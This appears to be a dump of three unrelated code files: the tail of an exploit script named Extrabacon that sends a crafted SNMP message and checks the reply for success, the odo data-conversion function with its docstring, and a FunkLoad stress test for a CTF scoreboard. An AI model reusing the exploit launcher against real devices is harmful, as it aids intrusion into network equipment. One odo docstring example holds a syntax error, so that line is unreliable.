print "[-] final SNMP msg is too large (%d >= %d) abort" % (len(exba_msg), 512)
sys.exit(1)
##
##
##
ret_list = [exba_msg]
return(ret_list)
def post_exploit(self, response):
##
##
snmp = SNMP(response)
print "[+] response:"
snmp.show()
recv_id = int(snmp.PDU.id.val)
if recv_id == self.params.request_id:
print "[+] received SNMP id %d, matches random id sent, likely success" % recv_id
return True
else:
print "[-] received SNMP id %d, expecting %d, mismatch! This is probably bad" % (recv_id, self.params.request_id)
return False
if __name__ == '__main__':
exp = Extrabacon('Extrabacon', '1.1.0.1')
exp.launch(sys.argv)
|
odo/odo.py | farukht/odo | 844 | 12688872 | from .into import into
def odo(source, target, **kwargs):
""" Push one dataset into another
Parameters
----------
source: object or string
The source of your data. Either an object (e.g. DataFrame),
or a string ('filename.csv')
target: object or string or type
The target for where you want your data to go.
Either an object, (e.g. []), a type, (e.g. list)
or a string (e.g. 'postgresql://hostname::tablename')
raise_on_errors: bool (optional, defaults to False)
Raise exceptions rather than reroute around them
**kwargs:
keyword arguments to pass through to conversion functions.
Optional Keyword Arguments
--------------------------
Odo passes keyword arguments (like ``sep=';'``) down to the functions
that it uses to perform conversions (like ``pandas.read_csv``). Due to the
quantity of possible optional keyword arguments we can not list them here.
See the following documentation for your format
* AWS - http://odo.pydata.org/en/latest/aws.html
* CSV - http://odo.pydata.org/en/latest/csv.html
* JSON - http://odo.pydata.org/en/latest/json.html
* HDF5 - http://odo.pydata.org/en/latest/hdf5.html
* HDFS - http://odo.pydata.org/en/latest/hdfs.html
* Hive - http://odo.pydata.org/en/latest/hive.html
* SAS - http://odo.pydata.org/en/latest/sas.html
* SQL - http://odo.pydata.org/en/latest/sql.html
* SSH - http://odo.pydata.org/en/latest/ssh.html
* Mongo - http://odo.pydata.org/en/latest/mongo.html
* Spark - http://odo.pydata.org/en/latest/spark.html
Examples
--------
>>> L = odo((1, 2, 3), list) # Convert things into new things
>>> L
[1, 2, 3]
>>> _ = odo((4, 5, 6), L) # Append things onto existing things
>>> L
[1, 2, 3, 4, 5, 6]
>>> odo([('Alice', 1), ('Bob', 2)], 'myfile.csv') # doctest: +SKIP
Explanation
-----------
We can specify data with a Python object like a ``list``, ``DataFrame``,
``sqlalchemy.Table``, ``h5py.Dataset``, etc..
We can specify data with a string URI like ``'myfile.csv'``,
``'myfiles.*.json'`` or ``'sqlite:///data.db::tablename'``. These are
matched by regular expression. See the ``resource`` function for more
details on string URIs.
We can optionally specify datatypes with the ``dshape=`` keyword, providing
a datashape. This allows us to be explicit about types when mismatches
occur or when our data doesn't hold the whole picture. See the
``discover`` function for more information on ``dshape``.
>>> ds = 'var * {name: string, balance: float64}'
>>> odo([('Alice', 100), ('Bob', 200)], 'accounts.json', , dshape=ds) # doctest: +SKIP
We can optionally specify keyword arguments to pass down to relevant
conversion functions. For example, when converting a CSV file we might
want to specify delimiter
>>> odo('accounts.csv', list, has_header=True, delimiter=';') # doctest: +SKIP
These keyword arguments trickle down to whatever function ``into`` uses
convert this particular format, functions like ``pandas.read_csv``.
See Also
--------
odo.resource.resource - Specify things with strings
datashape.discover - Get datashape of data
odo.convert.convert - Convert things into new things
odo.append.append - Add things onto existing things
"""
return into(target, source, **kwargs)
|
scoreboard/bin/stress_test.py | aprilsanchez/ictf-framework | 110 | 12688882 | import unittest
from random import random
from funkload.FunkLoadTestCase import FunkLoadTestCase
from webunit.utility import Upload
from funkload.utils import Data
class Stress_Test(FunkLoadTestCase):
def setUp(self):
self.server_url = self.conf_get('main', 'url')
self.setBasicAuth('<EMAIL>', 'testing!')
pass
def test_simple(self):
# The description should be set in the configuration file
server_url = self.server_url
# begin test ---------------------------------------------
nb_time = self.conf_getInt('test_simple', 'nb_time')
ap_list = self.conf_get('test_simple', 'ap_list').split(",")
#print "aplist,", ap_list
for i in range(nb_time):
for ap in ap_list:
self.get('https://'+server_url+ap, description='Get URL')
# end test ------------
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.